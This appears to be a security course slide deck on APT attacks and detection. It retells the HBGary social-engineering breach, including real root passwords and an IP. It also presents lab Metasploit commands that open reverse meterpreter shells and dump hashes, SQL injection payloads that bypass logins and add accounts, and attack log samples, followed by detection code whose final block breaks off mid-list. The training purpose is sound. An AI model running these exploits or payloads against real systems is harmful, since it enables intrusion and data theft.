HB Gary
• And what was done with Greg's mail? A little bit
of social engineering, that's what.
• Contained within Greg's mail were two bits of
useful information.
– The root password to the machine running Greg's
rootkit.com site was either "88j4bb3rw0cky88" or
"88Scr3am3r88".
– Jussi Jaakonaho, "Chief Security Specialist" at Nokia,
had root access.
– Vandalizing the website stored on the machine was
now within reach.
HB Gary
• The attackers just needed a little bit more
information:
– they needed a regular, non-root user account to log in
with, because as a standard security procedure, direct
ssh access with the root account is disabled.
– Armed with the two pieces of knowledge above, and
with Greg's e-mail account in their control, the social
engineers set about their task.
HB Gary
• The e-mail correspondence tells the whole
story:
– From: Greg
To: Jussi
Subject: need to ssh into rootkit
im in europe and need to ssh into the server. can you drop
open up firewall and allow ssh through port 59022 or
something vague? and is our root password still
88j4bb3rw0cky88 or did we change to 88Scr3am3r88 ?
thanks
HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
hi, do you have public ip? or should i just drop fw? and it is
w0cky - tho no remote root access allowed
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
no i dont have the public ip with me at the moment because im
ready for a small meeting and im in a rush. if anything just reset
my password to changeme123 and give me public ip and ill ssh
in and reset my pw.
HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
ok, it should now accept from anywhere to 47152 as ssh. i am doing
testing so that it works for sure. your password is changeme123
i am online so just shoot me if you need something. in europe, but not
in finland?
_jussi
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
if i can squeeze out time maybe we can catch up.. ill be in germany
for a little bit. anyway I can't ssh into rootkit. you sure the ips still
65.74.181.141?
thanks
HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
does it work now?
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
yes jussi thanks did you reset the user greg or?
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
nope. your account is named as hoglund
• From: Greg
To: Jussi
Subject: Re: need to ssh into rootkit
yup im logged in thanks ill email you in a few, im backed up
HB Gary
• To be fair to Jussi, the fake Greg appeared to
know the root password and, well, the e-mails
were coming from Greg's own e-mail
address.
• But over the course of a few e-mails it was
clear that "Greg" had forgotten both his
username and his password.
• And Jussi handed them to him on a platter
Night Dragon
Night Dragon (Jan-Feb 2011)
• Night Dragon is a coordinated, covert and targeted cyberattack
• Conducted against global oil, energy, and petrochemical companies.
– Exxon Mobil, Royal Dutch Shell, BP, Marathon Oil,
ConocoPhillips and Baker Hughes
• The attack has involved:
– Social engineering,
– Spear-phishing attacks,
– Exploitation of Microsoft Windows OS vulnerabilities,
– Microsoft Active Directory compromises,
– The use of remote administration tools (RATs)
• The objective is to harvest sensitive competitive proprietary operations and project-financing information
Night Dragon
Night Dragon
• The Night Dragon attacks work by methodical and progressive intrusions into the targeted infrastructure.
• Several basic activities are performed by the
Night Dragon operation:
– Deploy privately developed and customized RAT tools, by first compromising perimeter security controls through SQL-injection exploits of extranet web servers, as well as targeted spear-phishing attacks of mobile worker laptops,
APT in Depth
DEMONSTRATIONS
Objectives
• To tie everything together we have learned
• Show some of the steps an attacker uses to compromise systems
• To get into the mindset of an attacker so that,
as an incident handler, you can anticipate
their moves
• To gain hands-on experience with various
attack tools
• To understand how the defenses work and
why they are important
So how do hackers do it?
• They have a process (with steps) of their
own!
– Step 1 – Reconnaissance “Recon”
– Step 2 – Scanning
– Step 3 – Exploit Systems
• Gaining Access
• Elevating Access
• App-level Attacks
• Denial of Service
– Step 4 – Keeping Access
– Step 5 – Covering the Tracks
Step 1 - Recon
• Open source investigation to gain information about a target
Step 2 - Scanning
• Attacker uses a variety of mechanisms to survey a target to find holes in the target’s defenses.
Step 3 - Exploiting
• The attacker tries to gain access, undermine an application or deny access to other users.
Step 4 – Keeping Access
• Attacker maintains access by manipulating the software installed on the system to achieve backdoor access.
Step 5 – Covering the Tracks
• The attackers maintain their hard-fought access by covering their tracks.
• They hide from users and systems
administrators using a variety of techniques
STEP 1 - Recon
Recon
• Reconnaissance is “casing the joint”
• Two general types of attackers:
– What we used to call “script kiddies” – Look for low hanging
fruit, and may skip this step
– Attackers out to get a particular site – this step is extremely
important
• To begin an attack, your adversary will gather as
much information as possible from open sources.
• Before bandits rob a bank, they will visit the
branch, look at the times the guards enter and
leave, and observe the location of cameras.
Recon
• Domain Information Leakage (aka whois)
• DNS Interrogation
• Web site searches
• Using Google as a Recon tool
• Sam Spade
• Web-based recon and attack tools
• Think Advanced Persistent Threat!
STEP 2 - Scanning
Scanning
• After completing a thorough reconnaissance of the target, attackers begin scans to find openings in the target system
Scanning the Perimeter
• Scanning is normally one of the initial activities an attacker may conduct to identify any vulnerable hosts that can be exploited
• We see numerous “port scanning” events
What does this look like…
Running NMAP
• Simple ARP Ping Scan
– nmap -v -sn 192.168.67.0/24 (ARP Ping Scan)
• Run a port scan
– nmap -sV 192.168.67.0/24
– In our case (to save time) – nmap -sV 192.168.67.10-11
Nmap Demonstration
What Did nmap tell us?
• 192.168.67.10
– Probably Windows Box
– Web server
– DNS
– lots of SMB stuff (AD maybe?)
• 192.168.67.11
– Probably Windows Box
– RPC stuff
– uPNP
• 192.168.67.12
– Attacker Machine
• 192.168.67.13
– ftp (vsftpd)
– SSH – OpenSSH
– HTTP – Apache
– Samba
– NFS
– MySQL
– Probable UNIX
O/S Fingerprinting
O/S Fingerprinting
• OS Fingerprinting is a method of detecting the remote host’s operating system using information leaked by that host’s TCP stack. To do this, we use:
– the responses it gives to carefully crafted packets (active
mode)
– or by observing captured network traffic (passive mode).
• These methods are possible because each OS
implements their TCP stack differently.
• OS Fingerprinting (ab)uses these differences.
Use of nmap for O/S Fingerprinting
• nmap -O 192.168.67.10 192.168.67.11 192.168.67.13
– 192.168.67.10 – Windows XP (maybe)
– 192.168.67.11 – Windows XP
– 192.168.67.13 – Linux
Nmap Demonstration
Vulnerability Scanners
Vulnerability Scanners
• Tools to help map a network, scan for open
ports, and find various vulnerabilities
• Test against a list of known exploits
– What about the unknown?
– That’s why we want to have security in-depth!
• Generate pretty reports
– Information overload
– What do you do with a 2,000 page report?
• Difference between vulnerability scanning and exploitation?
– A vulnerability scan only tests theoretically that a system is vulnerable; the system is not normally exploited
Vulnerability Scanners
• Vulnerability database - It contains a list of vulnerabilities for a variety of systems and describes how those vulnerabilities should be checked.
• User configuration tool - By interacting with this component of the vulnerability scanner, the user selects the target systems and identifies which vulnerability checks to run.
• Scanning engine - Based on the vulnerability database and user configuration, this tool formulates packets and sends them to the target to determine whether vulnerabilities are present.
• Knowledge base of current active scan – Keeps track of the current scan, remembering the discovered vulnerabilities, and feeding data to the scanning engine.
• Results repository and report generation tool - Generates reports for its user, explaining which vulnerabilities were discovered on which targets and possibly recommending remedial actions for dealing with the discovered flaws.
A bunch of vulnerability scanners
Vulnerability Scanner - Nessus
Nessus
• Free (kind of) general vulnerability scanner maintained by Tenable Network Security
– Software is free to use; the engine has been closed-source since Nessus 3 (2005), only the older Nessus 2 code was GPL
– Signatures are either free (home feed) or $$$ (professional feed) – Difference is how often you get updates
• As such it is used by the white hat community as well as the black hat community
• Project started by Renaud Deraison
• Available at www.nessus.org
• Consists of a client and server, with modular plug-ins for individual tests
• Now the client is web-based
Nessus - Architecture
• Client-server architecture
• Both can run on the same machine
• Tenable now will outsource the server component as an ASP
• Information sent between the two is encrypted
Nessus - Platform
• Server
– Windows (XP, 2003, Vista, 2008, 7)
– Mac OS X
– Linux (Debian, Fedora, Red Hat, SUSE, Ubuntu)
– FreeBSD
– Solaris 10
• Client
– Pretty much anything with a browser (including the iPhone)
Nessus Plugins
• There is a defined API for writing Nessus plugins
– Some plugins written in C
– Plugins can be written in the Nessus Attack Scripting Language (NASL)
– One plugin is in charge of doing one attack and to report the rest to the Nessus server
– Each plugin can use some functions of the Nessus library, called libnessus, and store information in a shared knowledge base.
Example Nessus Output
Running Nessus
• https://192.168.67.12:8834
• Let’s create a scan policy
Nessus Demonstration
Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host due to a
flaw in the 'Server' service.
– The remote host is vulnerable to a buffer overrun in the
'Server’ service that may allow an attacker to execute
arbitrary code on the remote host with the 'System'
privileges.
• 192.168.67.10
– Arbitrary code can be executed on the remote host through the WINS service
– The remote host has a Windows WINS server installed. The
remote version of this server has two vulnerabilities that may
allow an attacker to execute arbitrary code on the remote
system
Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host.
– The remote host is running a version of Windows that has a
flaw in its RPC interface, which may allow an attacker to
execute arbitrary code and gain SYSTEM privileges.
• 192.168.67.10
– The remote Windows host has an ASN.1 library that could
allow an attacker to execute arbitrary code on this host.
– To exploit this flaw, an attacker would need to send a specially crafted ASN.1 encoded packet with improperly advertised lengths.
Running Nessus
• 192.168.67.11
– Arbitrary code can be executed on the remote host due to a flaw in the 'Server' service
– The remote host is vulnerable to a buffer overrun in the
'Server’ service that may allow an attacker to execute
arbitrary code on the remote host with the 'System'
privileges.
– Exploitable With: Canvas (CANVAS), Core Impact, Metasploit (Microsoft Server Service Relative Path Stack Corruption)
Running Nessus
• 192.168.67.13
– The remote FTP server is vulnerable to a FTP server
bounce attack.
– It is possible to force the remote FTP server to connect
to third parties using the PORT command.
• 192.168.67.13
– An administrative account on the remote host uses a
weak password.
– The account 'root' has the password 'password'. An
attacker may use it to gain further privileges on this
system
STEP 3 - Exploiting
Exploiting
• Using the information we discovered regarding ports and services, research known vulnerabilities
• Similarly, use the results from Nessus to determine the exploit for a given vulnerability
MetaSploit
• Microsoft Security Bulletin IDs (e.g. MS08-067) translate to Metasploit exploit modules
• http://www.metasploit.net/modules
• Search by:
– (OSVDB) Open Source Vulnerability Database ID
– BugTraq ID
– Full Text Search
– (CVE) Common Vulnerabilities and Exposures ID
– Microsoft Security Bulletin ID
MetaSploit – Example #1
• MS08-067: Vulnerability in Server service could allow remote code execution
– Defect in Netapi32.dll
• MS08-067 on 192.168.67.11
– msf > use exploit/windows/smb/ms08_067_netapi
– msf > show payloads
– msf > set PAYLOAD windows/meterpreter/reverse_tcp
– msf > set LHOST [My_IP_Address]
– msf > set RHOST [Victim_IP_Address]
– msf > exploit
MetaSploit – Example #1
• Now that we have executed an exploit
– Let’s own the box
– meterpreter > sysinfo
– meterpreter > getsystem (Elevate privilege)
– meterpreter > getprivs
– meterpreter > shell (grab a shell)
– meterpreter > hashdump (dump the local SAM)
• Ophcrack anyone?
Metasploit Demonstration
Keeping Access?
• Rootkit?
• Backdoor?
• Backup account?
• RDP?
How about a bit of DoS?
• 192.168.67.10 – Our Windows 2003 Domain Controller
• MS04-007
– Microsoft ASN.1 Library Bitstring Heap Overflow
– This is an exploit for a previously undisclosed vulnerability in
the bit string decoding code in the Microsoft ASN.1 library.
– You are only allowed one attempt with this vulnerability. If the
payload fails to execute, the LSASS system service will crash
and the target system will automatically reboot itself in 60
seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system.
How about a bit of DoS?
• msf > use exploit/windows/smb/ms04_007_killbill
• msf exploit(ms04_007_killbill) > show payloads
• msf exploit(ms04_007_killbill) > set PAYLOAD
windows/meterpreter/reverse_tcp
• msf exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS]
• msf exploit(ms04_007_killbill) > set RHOST [TARGET IP]
• msf exploit(ms04_007_killbill) > exploit
Metasploit Demonstration
Web Applications
SQL Injection - Review
• SQL injection is a particularly widespread and dangerous form of injection
– To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database
– By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to the database
Hacme Bank
• Windows 2003 Server (patched)
• Microsoft IIS web server
• Microsoft SQL Server 2005
• .NET Framework
Hacme Bank
• Online banking application
• Offers a bunch of features
– Transfer funds - The application allows users of the
applications to transfer funds from one account to another.
– Request a loan - The users will be able to request a loan
from the application to any of their internal accounts. The
interest rates are preset and vary with the loan period of the
loan requested
– View transactions
– Manage your bank accounts
– Change password
– Post messages
Hacme Bank
• Offers a bunch of features
– Admin interface
• Manage all accounts
• Manage messages
• Manage users
• Unrestricted SQL queries
Let’s Test the App…
• Username: jv Password: jv789
• Username: jm Password: jm789
• Username: jc Password: jc789
SQL Demonstration
Demo #1
• ' OR 1=1--
• Well known hack…
• In the username or password field
• Standard login may look like this:
– SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'
• Ours comes out as follows (the -- comments out the rest of the line, so the password check never runs):
– SELECT Count(*) FROM Users WHERE UserName='' OR 1=1--' AND Password=''
• Let’s try it…
Demo #1
• The expression 1=1 is always true for every row in the table, and a true expression OR'd with another expression will always return true.
• So, assuming there's at least one row in the Users table, this SQL will always return a nonzero count of records.
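The bypass above, as an added example that is not Hacme Bank's code and not part of the original deck: a Python login check that builds the query by string concatenation (the pattern the slide shows), the ' OR 1=1-- input run against it, and the parameterized version of the same query, which is not fooled. SQLite standing in for SQL Server 2005, and the Users table with the three demo accounts, are assumptions made so the script runs offline.

```python
"""Added example, not Hacme Bank's code: a login check built by string
concatenation, the ' OR 1=1-- bypass against it, and the parameterized fix.
Assumptions: SQLite stands in for SQL Server 2005, and the Users table and
its three rows below are constructed sample data."""
import sqlite3

PAYLOAD = "' OR 1=1--"   # the input from the slide, typed into the username field


def make_db():
    """In-memory Users table holding the demo accounts from the Hacme Bank slide."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (UserName TEXT, Password TEXT);
        INSERT INTO Users VALUES ('jv', 'jv789');
        INSERT INTO Users VALUES ('jm', 'jm789');
        INSERT INTO Users VALUES ('jc', 'jc789');
    """)
    return conn


def build_vulnerable_sql(username, password):
    """The flaw: user input is pasted into the SQL text, so a quote closes the
    string literal and -- comments out everything after it."""
    return ("SELECT Count(*) FROM Users WHERE UserName='%s' AND Password='%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """True when the string-built query finds at least one row."""
    count = conn.execute(build_vulnerable_sql(username, password)).fetchone()[0]
    return count > 0


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver sends the values separately
    from the SQL text, so the payload is compared literally against UserName."""
    sql = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    count = conn.execute(sql, (username, password)).fetchone()[0]
    return count > 0


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(PAYLOAD, "anything"))
    print("vulnerable login with payload:   ", vulnerable_login(db, PAYLOAD, "anything"))
    print("parameterized login with payload:", safe_login(db, PAYLOAD, "anything"))
    print("parameterized login, real creds: ", safe_login(db, "jv", "jv789"))
```

Running it prints the exact query text the server receives, with the -- swallowing the password clause; SQL Server uses the same line-comment syntax, so the behaviour against Hacme Bank is the same.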
Demo #2
• ' HAVING 1=1--
• What does the error give us?
• Using the error information above, the
attacker can determine that the name of the
table storing login information is FSB_USERS
and that it has a column named USER_ID.
Demo #2
• ' UNION SELECT * FROM FSB_USERS WHERE user_id = 'JV' GROUP BY user_id;--
• What does the error give us?
• This process is known as database
enumeration.
• Armed with this information, the attacker now
attempts to determine the data type of each
column.
Demo #2
• '; INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--
• Any thoughts on what this will do?
Browser Exploits
Browser Exploit
• Internet Explorer Memory Corruption
• MS10-002 – aka “Aurora”
• Solution to Aurora was DEP & ASLR
• We are going to run this on our Windows XP system
• Just needed the user to click on a link that was trusted on a website or e-mail
Aurora Demonstration
Browser Exploit
• Internet Explorer CSS Recursive Import Use
After Free
• Exploits a memory corruption vulnerability within
Microsoft's HTML engine (mshtml)
• When parsing an HTML page containing a
recursive CSS import, a C++ object is deleted
and later reused.
• This leads to arbitrary code execution.
• This exploit utilizes a combination of heap
spraying and the .NET 2.0 'mscorie.dll' module
Browser Exploit
• This module is reliable on all Windows versions
with .NET 2.0.50727 installed (IE 6-8)
• Specifically uses the exploit documented in MS11-003.
• Just needed the user to click on a link that was
trusted on a website or e-mail
• Bypasses DEP and ASLR
– Address space layout randomization - technique which
involves randomly arranging the positions of key data areas,
usually including the base of the executable and position of
libraries, heap, and stack, in a process's address space.
– Data Execution prevention - prevent an application or service
from executing code from a non-executable memory region
DEP Bypass Demonstration
APT IN DEPTH
DETECTING APT
All About the Traffic...
• As we have seen… successful targeted
attacks depend on remote access and control
• The network activity associated with remote
control can be identified, contained and
disrupted through the analysis of outbound
network traffic.
• Important to know what is normal and what is not (baselining)
• If an APT attacker wants to stay hidden, he
will try to mimic normal traffic/access as much
as possible
All About the Traffic...
• Look for outbound traffic patterns that are out of the ordinary
– DNS requests to non-internal name servers
– Large amounts of traffic leaving your network to non
North American destinations
– Port 80/443 requests to sites in *.ru and *.cn
– Access to known malware domains
– Use of credentials on interesting or abnormal systems
All About the Traffic...
• Look for inbound traffic patterns that are out of the ordinary
– Connections to interesting ports from unknown sources such as TCP/1433, TCP/8080, TCP/53, UDP/53
– “Normal” looking traffic from countries you do not do business with (i.e. China, TCP/80)
– Consistent inbound “portscan” traffic from eastern Europe and Asia on non-well known ports (i.e. C&C)
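The outbound and inbound checks on the two slides above, as an added example that is not part of the original deck: a Python rule set run over constructed flow records (source, destination, protocol, destination port and, where the sensor knows it, the destination hostname). The internal ranges, the approved resolver, the malware-domain list and the port-scan threshold are assumptions chosen for the demo, not values from the talk.

```python
"""Added example, not from the deck: the outbound/inbound checks the two
'All About the Traffic' slides list, run over constructed flow records.
Assumptions: the internal ranges, the approved resolver, the bad-domain list
and the port-scan threshold below are demo values."""
import ipaddress
from collections import defaultdict

INTERNAL = [ipaddress.ip_network("10.0.0.0/8"),
            ipaddress.ip_network("192.168.0.0/16")]
APPROVED_RESOLVERS = {"10.0.0.53"}            # assumption: the org's own DNS servers
INTERESTING_PORTS = {("tcp", 1433), ("tcp", 8080), ("tcp", 53), ("udp", 53)}
WATCHED_TLDS = (".ru", ".cn")                  # from the slide
KNOWN_BAD_DOMAINS = {"evil-c2.example"}        # assumption: from a blocklist feed
PORTSCAN_THRESHOLD = 10                        # distinct ports from one source


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def check_flows(flows):
    """flows: dicts with src, dst, proto, dport and optional dst_host.
    Returns (rule, src, detail) findings in the order they are raised."""
    findings = []
    ports_by_src = defaultdict(set)
    for f in flows:
        src, dst, proto, dport = f["src"], f["dst"], f["proto"], f["dport"]
        host = f.get("dst_host", "")
        detail = f"{dst}:{dport}"
        if is_internal(src) and not is_internal(dst):          # outbound
            if dport == 53 and dst not in APPROVED_RESOLVERS:
                findings.append(("dns_to_external_resolver", src, detail))
            if dport in (80, 443) and host.endswith(WATCHED_TLDS):
                findings.append(("web_to_watched_tld", src, host))
            if host in KNOWN_BAD_DOMAINS:
                findings.append(("known_malware_domain", src, host))
        elif not is_internal(src) and is_internal(dst):        # inbound
            if (proto, dport) in INTERESTING_PORTS:
                findings.append(("inbound_interesting_port", src, detail))
            ports_by_src[src].add(dport)
    # Many distinct destination ports from one external source = port scan.
    for src, ports in ports_by_src.items():
        if len(ports) >= PORTSCAN_THRESHOLD:
            findings.append(("inbound_portscan", src, f"{len(ports)} ports"))
    return findings


# Constructed sample flows (RFC 5737 documentation addresses plus one public
# resolver); not captured traffic.
SAMPLE_FLOWS = [
    {"src": "10.1.2.3", "dst": "8.8.8.8", "proto": "udp", "dport": 53},
    {"src": "10.1.2.3", "dst": "10.0.0.53", "proto": "udp", "dport": 53},
    {"src": "10.1.2.4", "dst": "203.0.113.9", "proto": "tcp", "dport": 443,
     "dst_host": "update.example.ru"},
    {"src": "10.1.2.5", "dst": "198.51.100.7", "proto": "tcp", "dport": 80,
     "dst_host": "evil-c2.example"},
    {"src": "198.51.100.200", "dst": "10.0.0.10", "proto": "tcp", "dport": 1433},
] + [{"src": "203.0.113.50", "dst": "10.0.0.10", "proto": "tcp", "dport": p}
     for p in range(1, 11)]

if __name__ == "__main__":
    for rule, src, detail in check_flows(SAMPLE_FLOWS):
        print(f"{rule:28} {src:16} {detail}")
```

The second flow (a lookup to the approved resolver) raises nothing, which is the point of the baseline: the rules describe what normal looks like and only the exceptions surface.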
All About the Traffic
All About the Traffic – Typical Botnet
Look at all the sources
of information…
Web Traffic
• Another important source of information
• If you can pull it into a SIEM, your job could be easier
• Manually, you want to look at the following:
– Apache – access_log, error_log
– IIS6 – %windir%\System32\LogFiles, IIS7 – %SystemDrive%\inetpub\logs\LogFiles
• Looking at these logs will help you identify:
– SQL Injection attacks
– XSS
– Path Traversal
– Etc.
Web Traffic - XSS
• 217.160.165.173 [12/Mar/2004:22:31:12 0500] "GET /foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200 578 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
• 217.160.165.173 [12/Mar/2004:22:37:17 0500] "GET /cgibin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1" 403 302 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
• These represent XSS type attacks
Web Traffic - Injection
• 81.171.1.165 [13/Mar/2004:10:46:43 0500] "HEAD http://www.sweetgeorgia.com/cgibin/af.cgi?_browser_out=|echo;id;exit| HTTP/1.0" 200 0 "http://www.sweetgeorgia.com/cgibin/af.cgi?_browser_out=|echo;id;exit|" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
• Trying to execute OS commands. The variable '_browser_out' contains a pipe symbol, followed by Unix system commands ('|echo;id;exit|').
Web Traffic - Injection
• 66.138.147.49 [13/Mar/2004:13:33:06 0500] "GET http://login.korea.yahoo.com/config/login?.redir_from=PROFILES?.&login=&.tries=1&.src=jpg&.last=&promo=&.intl=us&.bypass=&.partner=&.chkP=Y&.done=http://jpager.yahoo.com/jpager/pager2.shtml&login=blood`1234567890&passwd=password HTTP/1.0" 200 566 "" ""
• Calling a login function. In its login name (parameter 'login') is a back tick symbol ('blood`1234567890').
• This might be a simple brute force attack or a test of how the application handles the back tick symbol.
Web Traffic – Path Traversal
• 68.48.142.117 [09/Mar/2004:22:29:43 0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/+dir HTTP/1.0" 200 566 "" ""
• The '%255c' is a double percent hex encoding. The
'%25’ resolves to a percent character ('%'), the
resulting '%5c’ resolves to a backslash ('\').
• The request tries to access the cmd.exe program, the
windows command shell to execute the 'dir’
command (list all files in a directory).
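The three log patterns above (XSS, command injection, path traversal), as an added example that is not part of the original deck: a Python scanner over constructed Apache access_log lines, modelled on the slide's examples and written in the fields Apache's combined format produces. It percent-decodes each request path repeatedly before matching, so the double-encoded %255c traversal is caught the same way a plain ../ would be. The patterns are a deliberately small rule set chosen for the demo, not a complete WAF signature list.

```python
"""Added example, not from the deck: a scanner over constructed Apache
access_log lines that flags the three attack classes the slides show (XSS,
command injection, path traversal). Paths are percent-decoded repeatedly
before matching so the double-encoded %255c traversal is caught.
Assumption: the patterns below are a deliberately small rule set, not a WAF."""
import re
from urllib.parse import unquote

# Apache combined format: ip ident user [time] "METHOD path PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

XSS_RE = re.compile(r'<\s*script|javascript:|onerror\s*=')
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|cmd\.exe|/etc/passwd')
# A shell metacharacter inside a parameter value (pipe, semicolon, backtick).
SHELL_META_RE = re.compile(r'=[^&]*[|;`]')


def full_decode(s, max_rounds=5):
    """Percent-decode until the string stops changing: %255c -> %5c -> backslash."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(path):
    """Return the attack class a fully decoded, lower-cased request path
    matches, or None for a benign request."""
    p = full_decode(path).lower()
    if XSS_RE.search(p):
        return "xss"
    if TRAVERSAL_RE.search(p):
        return "path_traversal"
    if SHELL_META_RE.search(p):
        return "command_injection"
    return None


def scan_log(lines):
    """Return a list of (ip, attack_class, raw_path) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue      # unparseable line: skipped here, a real tool would count these
        kind = classify(m.group("path"))
        if kind:
            hits.append((m.group("ip"), kind, m.group("path")))
    return hits


# Constructed log lines modelled on the slide's examples.
SAMPLE_LOG = [
    '217.160.165.173 - - [12/Mar/2004:22:31:12 -0500] "GET /foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200 578 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"',
    '81.171.1.165 - - [13/Mar/2004:10:46:43 -0500] "HEAD /cgi-bin/af.cgi?_browser_out=|echo;id;exit| HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '66.138.147.49 - - [13/Mar/2004:13:33:06 -0500] "GET /config/login?.tries=1&login=blood`1234567890&passwd=password HTTP/1.0" 200 566 "-" "-"',
    '68.48.142.117 - - [09/Mar/2004:22:29:43 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/+dir HTTP/1.0" 200 566 "-" "-"',
    '10.1.1.5 - - [09/Mar/2004:22:30:01 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, kind, path in scan_log(SAMPLE_LOG):
        print(f"{ip:16} {kind:18} {path}")
```

The back-tick login from the slide lands in the command_injection bucket because the metacharacter is in a parameter value; on a busy site that rule will also catch legitimate values containing a semicolon, so it is the one to tune first against your own baseline.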
Detecting APT
SECURITY INFORMATION
EVENT MANAGEMENT
Security Information Event Mgmt.
• Aka “SIEM”
• Reducing Security Information “Overload”
• Gathering, correlating, aggregating, analyzing and presenting information from disparate systems
• Normally provides dashboards, alerting, etc to allow security analysts to wade through the millions of events in their organizations
• Some free tools – Splunk, OSSEC, Snort
Use of SIEM Products
• On their own, they are useless
• SIEM products do a great job at aggregating
and correlating traffic
• Without intelligence, a SIEM won't detect a
relentless targeted attack designed to avoid
raising any red flags
• They're normally tuned to catch unusual activity, not stealthy attacks that hide behind legitimate user credentials or normal traffic.
“A better SIEM with faster results and operationalizing security data in a way that closes that window and risk in a more timely manner limits the amount of time the attacker”
(Eddie Schwartz – CSO, RSA)
Exception Monitoring
• A SIEM is designed to alert on events (the “E” in
SIEM)
• We have to focus on what traffic/activity is normal
= “Baseline” and then zero in on the exceptions
to this
• Organizations spend lots of dollars buying SIEMs to meet PCI-DSS compliance
• We have to re-direct our SIEM to deal with APT
• We are not simply looking for non-compliant systems based on a predetermined policy, we are looking at modeling behavior and understanding what is normal and what is not
Exception Monitoring – Example #1
• Say your SIEM logs physical access (through your ID badge system)
• On Tuesday at 4:00pm you see Joe Smith swipe his card exiting the HQ building
• On Tuesday at 4:02pm you see Joe Smith log in to a server on the perimeter of your network…
• Correlation becomes very important!
Exception Monitoring – Example #2
• Sally is a financial analyst who accesses
PeopleSoft, e-mail, billing system
• On Wednesday, logs show she has attempted to
access a Unix box running DNS for the
organization
• Sally, based on access correlation and
baselining, logs into the Active Directory between
8:30am and 8:39am M-F
• We have noted logins to the AD on Saturday and
Sunday at 1:31am, 6:02am, and 8:33pm.
• What does this tell us?
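The two exception-monitoring examples above, as an added example that is not part of the original deck: Python correlation logic run over constructed badge and login events. It flags a login by someone whose most recent badge event is an exit (Example #1) and, after learning each user's weekday, time-of-day and host profile from a week of logins, flags logins to an unusual host, on an unusual day or at an unusual hour (Example #2). Names, hosts, timestamps and the 30-minute slack are demo assumptions.

```python
"""Added example, not from the deck: the two correlations sketched in
Exception Monitoring Examples #1 and #2, run over constructed events.
Assumptions: names, hosts, timestamps and the 30-minute slack are demo values."""
from datetime import datetime, time, timedelta


def badge_login_conflicts(events):
    """events: dicts with user, ts (datetime), kind in
    {'badge_enter', 'badge_exit', 'login'} and host (logins only).
    Flags any login by a user whose most recent badge event is an exit."""
    badged_out = set()
    conflicts = []
    for e in sorted(events, key=lambda x: x["ts"]):
        user = e["user"]
        if e["kind"] == "badge_exit":
            badged_out.add(user)
        elif e["kind"] == "badge_enter":
            badged_out.discard(user)
        elif e["kind"] == "login" and user in badged_out:
            conflicts.append((user, e["ts"], e["host"]))
    return conflicts


def learn_baseline(logins):
    """Per user: weekdays seen, earliest/latest login time, hosts touched."""
    base = {}
    for l in logins:
        b = base.setdefault(l["user"], {"days": set(), "lo": time.max,
                                        "hi": time.min, "hosts": set()})
        b["days"].add(l["ts"].weekday())
        b["lo"] = min(b["lo"], l["ts"].time())
        b["hi"] = max(b["hi"], l["ts"].time())
        b["hosts"].add(l["host"])
    return base


def off_baseline_logins(base, logins, slack=timedelta(minutes=30)):
    """Return (user, ts, host, reason) for logins outside the learned profile.
    Checks are ordered so the most interesting deviation is the one reported."""
    out = []
    for l in logins:
        user, ts, host = l["user"], l["ts"], l["host"]
        b = base.get(user)
        if b is None:
            out.append((user, ts, host, "no baseline"))
        elif host not in b["hosts"]:
            out.append((user, ts, host, "unusual host"))
        elif ts.weekday() not in b["days"]:
            out.append((user, ts, host, "unusual day"))
        else:
            lo = datetime.combine(ts.date(), b["lo"]) - slack
            hi = datetime.combine(ts.date(), b["hi"]) + slack
            if not lo <= ts <= hi:
                out.append((user, ts, host, "unusual hour"))
    return out


# Constructed events. 3-7 Oct 2011 is Monday to Friday, 8 Oct is a Saturday.
BADGE_EVENTS = [
    {"user": "jsmith", "ts": datetime(2011, 10, 4, 8, 5), "kind": "badge_enter"},
    {"user": "jsmith", "ts": datetime(2011, 10, 4, 16, 0), "kind": "badge_exit"},
    {"user": "jsmith", "ts": datetime(2011, 10, 4, 16, 2), "kind": "login",
     "host": "dmz-web01"},
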